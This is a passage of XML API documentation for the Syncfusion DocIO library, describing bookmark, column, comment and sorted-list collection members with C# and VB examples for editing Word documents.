                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Get the bookmark instance with bookmark name
                Dim bookmark As Syncfusion.DocIO.DLS.Bookmark = document.Bookmarks("Northwind")
                'Access the bookmark start�s owner paragraph using bookmark and change its back color
                bookmark.BookmarkStart.OwnerParagraph.ParagraphFormat.BackColor = Color.AliceBlue
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.Bookmark"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarkStart"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarkEnd"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.BookmarkCollection"/> class.
            </summary>
            <param name="doc">The document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkCollection.FindByName(System.String)">
            <summary>
            Finds <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/> with specific name in the document.
            </summary>
            <param name="name">The <b>string </b>that represents the name of the bookmark to find.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/> with the specified name.</returns>
            <example>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Get the bookmark instance using FindByName method of BookmarkCollection with bookmark name
                Bookmark bookmark = document.Bookmarks.FindByName("Northwind");
                //Access the bookmark start�s owner paragraph using bookmark and change its back color
                bookmark.BookmarkStart.OwnerParagraph.ParagraphFormat.BackColor = Color.AliceBlue;
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Get the bookmark instance using FindByName method of BookmarkCollection with bookmark name
                Dim bookmark As Bookmark = document.Bookmarks.FindByName("Northwind")
                'Access the bookmark start�s owner paragraph using bookmark and change its back color
                bookmark.BookmarkStart.OwnerParagraph.ParagraphFormat.BackColor = Color.AliceBlue
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkCollection.RemoveAt(System.Int32)">
            <summary>
            Removes a bookmark at the specified index.
            </summary>
            <param name="index">The <b>integer </b>that represents the position of the bookmark to remove.</param>
            <exception cref="T:System.ArgumentOutOfRange">The index is not valid in the <see cref="T:Syncfusion.DocIO.DLS.BookmarkCollection"/>.</exception>
            <example>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Remove the bookmark at the second index from Word document.
                document.Bookmarks.RemoveAt(1);
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Remove the bookmark at the second index from Word document.
                document.Bookmarks.RemoveAt(1)
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkCollection.Remove(Syncfusion.DocIO.DLS.Bookmark)">
            <summary>
            Removes the specified bookmark from the document.
            </summary>
            <param name="bookmark">The <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/> to be removed.</param>
            <example>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Get the bookmark instance using FindByName method of BookmarkCollection with bookmark name
                Bookmark bookmark = document.Bookmarks.FindByName("Northwind");
                //Remove the bookmark named "Northwind" from Word document.
                document.Bookmarks.Remove(bookmark);
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Get the bookmark instance using FindByName method of BookmarkCollection with bookmark name
                Dim bookmark As Bookmark = document.Bookmarks.FindByName("Northwind")
                'Remove the bookmark named "Northwind" from Word document.
                document.Bookmarks.Remove(bookmark)
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkCollection.Clear">
            <summary>
            Removes all the bookmarks in the document. 
            </summary>        
            <example>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Remove all the bookmarks from Word document
                document.Bookmarks.Clear();
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Remove all the bookmarks from Word document
                document.Bookmarks.Clear()
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkCollection.Add(Syncfusion.DocIO.DLS.Bookmark)">
            <summary>
            Adds Bookmark object to the collection.
            </summary>
            <param name="bookmark"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkCollection.AttachBookmarkStart(Syncfusion.DocIO.DLS.BookmarkStart)">
            <summary>
            Attaches the bookmark start.
            </summary>
            <param name="bookmarkStart">The bookmark start.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkCollection.AttachBookmarkEnd(Syncfusion.DocIO.DLS.BookmarkEnd)">
            <summary>
            Sets BookmarkEnd for the bookmark specified by Name
            </summary>
            <param name="bookmarkEnd"></param>
            
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarkCollection.Item(System.String)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/> with the specified name.
            </summary>
            <param name="name">The <b>string </b>that represents the name of the bookmark in the document to get.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/> with the specified name.</value>
            <exception cref="T:System.ArgumentNullException">The specified bookmark name is not present in the document.</exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarkCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/> at the specified index.
            </summary>
            <param name="index">The <b>integer </b>that represents the position of the bookmark in the document to get.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/> at the specified index.</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid in the <see cref="T:Syncfusion.DocIO.DLS.BookmarkCollection"/></exception>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ColumnCollection">
            <summary>
            Represents the collection of <see cref="T:Syncfusion.DocIO.DLS.Column"/> in the section of a Word document.
            </summary>
            <example>
            <para>The following code example demonstrates how to </para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance 
                WordDocument document = new WordDocument("Template.docx");
                foreach (WSection section in document.Sections)
                {
                    //Populates the specified number of columns with specified spacing.
                    if (section.Columns.Count &gt; 0)
                        section.Columns.Populate(2, 10);
                }
                //Add the section into Word document
                IWSection newSection = document.AddSection();
                //Add the column into the section
                newSection.AddColumn(150, 20);
                //Add the column into the section
                newSection.AddColumn(150, 20);
                //Add a paragraph to created section
                IWParagraph paragraph = newSection.AddParagraph();
                //Add a paragraph to created section
                paragraph = newSection.AddParagraph();
                string paraText = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula";
                //Append the text to the created paragraph
                paragraph.AppendText(paraText);
                //Add the column breaks
                paragraph.AppendBreak(BreakType.ColumnBreak);
                //Add a paragraph to created section
                paragraph = newSection.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText(paraText);
                //Add the column breaks
                paragraph.AppendBreak(BreakType.ColumnBreak);
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                For Each section As WSection In document.Sections
                	'Populates the specified number of columns with specified spacing.
                	If section.Columns.Count &gt; 0 Then
                		section.Columns.Populate(2, 10)
                	End If
                Next
                'Add the section into Word document
                Dim newSection As IWSection = document.AddSection()
                'Add the column into the section
                newSection.AddColumn(150, 20)
                'Add the column into the section
                newSection.AddColumn(150, 20)
                'Add a paragraph to created section
                Dim paragraph As IWParagraph = newSection.AddParagraph()
                'Add a paragraph to created section
                paragraph = newSection.AddParagraph()
                Dim paraText As String = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula"
                'Append the text to the created paragraph
                paragraph.AppendText(paraText)
                'Add the column breaks
                paragraph.AppendBreak(BreakType.ColumnBreak)
                'Add a paragraph to created section
                paragraph = newSection.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText(paraText)
                'Add the column breaks
                paragraph.AppendBreak(BreakType.ColumnBreak)
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ColumnCollection.#ctor(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.ColumnCollection"/> class.
            </summary>
            <param name="section">The section.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ColumnCollection.Add(Syncfusion.DocIO.DLS.Column)">
            <summary>
            Adds <see cref="T:Syncfusion.DocIO.DLS.Column"/> object to the collection.
            </summary>
            <param name="column">The <see cref="T:Syncfusion.DocIO.DLS.Column"/> to be added.</param>
            <returns>The zero-based index of the column.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ColumnCollection.Populate(System.Int32,System.Single)">
            <summary>
            Populates the specified number of columns with specified spacing.
            </summary>
            <param name="count">The <b>integer</b> specifying the columns count.</param>
            <param name="spacing">The <b>float</b> that specifies the spacing between columns.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ColumnCollection.Add(Syncfusion.DocIO.DLS.Column,System.Boolean)">
            <summary>
            Adds <see cref="T:Syncfusion.DocIO.DLS.Column"/> object to the collection.
            </summary>
            <param name="column">The <see cref="T:Syncfusion.DocIO.DLS.Column"/> to be added.</param>
            <param name="isOpening">The <b>bool</b> that specifies whether the document is opened.</param>
            <returns>The zero-based index of the column.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ColumnCollection.CloneTo(Syncfusion.DocIO.DLS.ColumnCollection)">
            <summary>
            Clones items to specified collection.
            </summary>
            <param name="coll">The collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ColumnCollection.CreateItem(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Creates the item.
            <exclude/>
            </summary>
            <param name="reader">The reader.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ColumnCollection.GetTagItemName">
            <summary>
            Gets name of xml tag
            <exclude/>
            </summary>
            <returns>The <b>string</b> that specifies the tag name.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ColumnCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.Column"/> at the specified index.
            </summary>
            <param name="index">The zero-based index of the column in the collection.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Column"/> at the specified index.</value>
            <exception cref="T:System.ArgumentOutOfRangeException"></exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ColumnCollection.OwnerSection">
            <summary>
            Gets the owner section.
            </summary>
            <value>The owner section.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.CommentsCollection">
            <summary>
            Represents the collection of <see cref="T:Syncfusion.DocIO.DLS.WComment"/> in the Word document.
            </summary>
            <example>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Comment.docx");
                //Iterate the comments in the Word document
                foreach (WComment comment in document.Comments)
                {
                    //Modify the last paragraph text of an existing comment if it is added by "Peter"
                    if (comment.Format.User == "Peter")
                        comment.TextBody.LastParagraph.Text = "Modified Comment Content";
                }
                document.Save("ModifiedComment.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Comment.docx")
                'Iterate the comments in the Word document
                For Each comment As WComment In document.Comments
                    'Modify the last paragraph text of an existing comment if it is added by "Peter"
                    If comment.Format.User = "Peter" Then
                        comment.TextBody.LastParagraph.Text = "Modified Comment Content"
                    End If
                Next
                document.Save("ModifiedComment.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.WComment"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CommentsCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.CommentsCollection"/> class.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CommentsCollection.Counts">
            <summary>
            Returns the total number of comments in the document. Read-only.
            </summary>
            <returns>The <b>integer</b> that specifies the total number of <see cref="T:Syncfusion.DocIO.DLS.WComment"/> in this <see cref="T:Syncfusion.DocIO.DLS.CommentsCollection"/>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CommentsCollection.RemoveAt(System.Int32)">
            <summary>
            Removes the <see cref="T:Syncfusion.DocIO.DLS.WComment"/> at specified index.
            </summary>
            <param name="index">The zero-based index of the comment to be removed.</param>
            <example>
            <para>The following code example demonstrates how to remove the comment at specified index in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Comment.docx");
                //Remove the second comment from a document
                document.Comments.RemoveAt(1);
                //Save and close the Word document
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Comment.docx")
                'Remove the second comment from a document
                document.Comments.RemoveAt(1)
                'Save and close the Word document
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CommentsCollection.Clear">
            <summary>
            Removes all the comments from the document.
            </summary>
            <example>
            <para>The following code example demonstrates how to remove all the comments from the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Comment.docx");
                //Remove all the comments in a Word document
                document.Comments.Clear();
                //Save and close the Word document
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Comment.docx")
                'Remove all the comments in a Word document
                document.Comments.Clear()
                'Save and close the Word document
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CommentsCollection.Add(Syncfusion.DocIO.DLS.WComment)">
            <summary>
            Adds the specified comment.
            </summary>
            <param name="comment"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CommentsCollection.Remove(Syncfusion.DocIO.DLS.WComment)">
            <summary>
            Removes the specified Comment.
            </summary>
            <param name="comment">The <see cref="T:Syncfusion.DocIO.DLS.WComment"/> to be removed.</param>
            <example>
            <para>The following code example demonstrates how to remove particular comment from the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Comment.docx");
                //Get the second comment from a document.
                WComment comment = document.Comments[1];
                //Remove comment from a document.
                document.Comments.Remove(comment);
                //Save and close the Word document
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Comment.docx")
                'Get the second comment from a document.
                Dim comment As WComment = document.Comments(1)
                'Remove comment from a document.
                document.Comments.Remove(comment)
                'Save and close the Word document
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CommentsCollection.Item(System.Int32)">
            <summary>
            Gets the comment at specified index. Read-only.
            </summary>
            <param name="index">The zero-based index of the comment in the collection.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WComment"/> at the specified index.</value>
            <exception cref="!:ArgumentOutOfRange">The index is not valid in the <see cref="T:Syncfusion.DocIO.DLS.CommentsCollection"/></exception>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocIOSortedList`2">
            <summary>
            Represents the sort options for list.
            </summary>
            <typeparam name="TKey">The type of the key.</typeparam>
            <typeparam name="TValue">The type of the value.</typeparam>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TypedSortedListEx`2">
            <summary>
            Represents the sort options for the list.
            </summary>
            <typeparam name="TKey"></typeparam>
            <typeparam name="TValue"></typeparam>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.DefaultCapacity">
            <summary>
            Default capacity of internal buffers.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.m_arrKeys">
            <summary>
            Array which store keys in sorted order.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.m_dicValues">
            <summary>
            Collection stores values.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.m_iSize">
            <summary>
            Size of collection.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.m_iVersion">
            <summary>
            Version of collection data.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.m_comparer">
            <summary>
            Default comparer for keys.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.m_listKeys">
            <summary>
            List of keys.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.m_lstValues">
            <summary>
            List of values.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.#ctor(System.Int32)">
            <summary>
            Creates an empty list with the specified initial capacity.
            </summary>
            <param name="initialCapacity">Initial capacity.</param>
            <exception cref="T:System.ArgumentOutOfRangeException">
            When initialCapacity is less than zero.
            </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.#ctor(System.Collections.Generic.IComparer{`0})">
            <summary>
            Creates an empty SortedList with the default initial capacity
            and specified comparer.
            </summary>
            <param name="comparer">
            The IComparer is used to determine whether two keys are equal.
            </param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.#ctor(System.Collections.Generic.IComparer{`0},System.Int32)">
            <summary>
            Creates an empty SortedList with the specified initial capacity
            and specified comparer.
            </summary>
            <param name="comparer">Initial capacity.</param>
            <param name="capacity">
            The IComparer is used to determine whether two keys are equal.
            </param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.#ctor(System.Collections.Generic.IDictionary{`0,`1})">
            <summary>
            Copies the elements from the specified dictionary to a new list
            with the same initial capacity as the number of elements copied.
            </summary>
            <param name="d">The IDictionary to copy.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.#ctor(System.Collections.Generic.IDictionary{`0,`1},System.Collections.Generic.IComparer{`0})">
            <summary>
            Copies the elements from the specified dictionary to a new list with the same
            initial capacity as the number of elements copied and with the specified comparer.
            </summary>
            <param name="d">The IDictionary to copy.</param>
            <param name="comparer">
            The IComparer to use to determine whether two keys are equal.
            </param>
            <exception cref="T:System.ArgumentNullException">
            When argument d is null.
            </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.Synchronized(Syncfusion.DocIO.DLS.TypedSortedListEx{`0,`1})">
            <summary>
            Returns a synchronized (thread-safe) wrapper for the SortedList.
            </summary>
            <param name="list">The SortedList to synchronize.</param>
            <returns>A synchronized (thread-safe) wrapper for the SortedList.</returns>
            <exception cref="T:System.ArgumentNullException">
            When list is null.
            </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.Add(`0,`1)">
            <summary>
            Adds an element with the provided key and value to the list.
            </summary>
            <param name="key">The Object to use as the key of the element to add.</param>
            <param name="value">The Object to use as the value of the element to add.</param>
            <exception cref="T:System.ArgumentNullException">
            When key is null.
            </exception>
            <exception cref="T:System.ArgumentException">
            When list already contains specified key.
            </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.Clear">
            <summary>
            Removes all elements from the collection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.Clone">
            <summary>
            Creates a new object that is a copy of the current instance.
            </summary>
            <returns>Copy of the current instance.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.CloneAll">
            <summary>
            Clone current instance.
            </summary>
            <returns>Returns clone of current object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.Contains(`0)">
            <summary>
            Determines whether the list contains an element with the specified key.
            </summary>
            <param name="key">Key of the element to search.</param>
            <returns>True if list contains specified key.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ContainsKey(`0)">
            <summary>
            Determines whether the list contains an element with the specified key.
            </summary>
            <param name="key">Key of the element to search.</param>
            <returns>True if list contains specified key.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ContainsValue(`1)">
            <summary>
            Determines whether the list contains the specified value.
            </summary>
            <param name="value">Value of the element to search.</param>
            <returns>True if list contains specified value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.CopyTo(System.Array,System.Int32)">
            <summary>
            Copies all the elements of the SortedListEx to the specified one-dimensional Array
            starting at the specified destination Array index.
            </summary>
            <param name="array">The one-dimensional Array that is the destination of the
            elements copied from the current list.</param>
            <param name="arrayIndex">The index in array at which copying begins.</param>
            <exception cref="T:System.ArgumentNullException">
            If specified array is null.
            </exception>
            <exception cref="T:System.ArgumentException">
            If rank of the array is not 1 or there are not enough elements.
            </exception>
            <exception cref="T:System.ArgumentOutOfRangeException">
            If specified arrayIndex is less than zero.
            </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.GetByIndex(System.Int32)">
            <summary>
            Gets the value at the specified index of the SortedListEx.
            </summary>
            <param name="index">The zero-based index of the value to get.</param>
            <returns>The value at the specified index of the SortedListEx.</returns>
            <exception cref="T:System.ArgumentOutOfRangeException">
            When index is less than zero or greater than size of the list.
            </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.GetKey(System.Int32)">
            <summary>
            Gets the key at the specified index of the SortedListEx.
            </summary>
            <param name="index">The zero-based index of the key to get.</param>
            <returns>The key at the specified index of the SortedListEx.</returns>
            <exception cref="T:System.ArgumentOutOfRangeException">
            When index is less than zero or greater than size of the list.
            </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.GetKeyList">
            <summary>
            Gets the keys in the SortedListEx.
            </summary>
            <returns>An IList containing the keys in the SortedListEx.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.GetValueList">
            <summary>
            Gets the values in the SortedListEx.
            </summary>
            <returns>An IList containing the values in the SortedListEx.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.IndexOfKey(`0)">
            <summary>
            Returns the zero-based index of the specified key.
            </summary>
            <param name="key">The key to locate.</param>
            <returns>The zero-based index of key, if key is found; otherwise, -1.</returns>
            <exception cref="T:System.ArgumentNullException">
            If specified key is null.
            </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.IndexOfValue(`1)">
            <summary>
            Returns the zero-based index of the first occurrence of the specified value.
            </summary>
            <param name="value">The value to locate (can be NULL).</param>
            <returns>
            The zero-based index of the first occurrence of value, if value is found;
            otherwise, -1.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.RemoveAt(System.Int32)">
            <summary>
            Removes the element at the specified index.
            </summary>
            <param name="index">The zero-based index of the element to remove.</param>
            <exception cref="T:System.ArgumentOutOfRangeException">
            When index is less than zero or greater than size of the list.
            </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.Remove(`0)">
             <summary>
            Removes the element with the specified key from SortedListEx.
             </summary>
             <param name="key">The key of the element to remove.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.SetByIndex(System.Int32,`1)">
            <summary>
            Replaces the value at the specific index.
            </summary>
            <param name="index">The zero-based index at which to save value.</param>
            <param name="value">The Object to save into. Can be NULL.</param>
            <exception cref="T:System.ArgumentOutOfRangeException">
            When index is less than zero or greater than size of the list.
            </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TrimToSize">
            <summary>
            Sets the capacity to the actual number of elements.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.System#Collections#IEnumerable#GetEnumerator">
            <summary>
            Returns an IEnumerator that can iterate through the SortedListEx.
            </summary>
            <returns>An IEnumerator for the SortedListEx.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.GetEnumerator">
            <summary>
            Returns an IEnumerator that can iterate through the SortedListEx.
            </summary>
            <returns>An IEnumerator for the SortedListEx.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.Insert(System.Int32,`0,`1)">
            <summary>
            Inserts element with specified key and value at specified index.
            </summary>
            <param name="index">The zero-based index to insert element at.</param>
            <param name="key">The key of the element to insert.</param>
            <param name="value">The value of the element to insert.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.EnsureCapacity(System.Int32)">
            <summary>
            Ensures that the capacity of this instance is at least the specified value.
            </summary>
            <param name="min">The minimum capacity to ensure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TryGetValue(`0,`1@)">
            <summary>
            Returns the value associated with the specified key.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.Capacity">
            <summary>
            Capacity of internal buffers.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.Count">
            <summary>
            Size of the collection. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.Keys">
            <summary>
            List of keys. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.Values">
            <summary>
            List of values. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.IsReadOnly">
            <summary>
            Returns True if list is readonly, False otherwise. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.IsFixedSize">
            <summary>
            Returns True if collection has fixed size, False otherwise.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.IsSynchronized">
            <summary>
            Returns True if the collection is synchronized, False otherwise.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.SyncRoot">
            <summary>
            Returns the object that can be used to synchronize access to the collection.
            Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.Item(`0)">
            <summary>
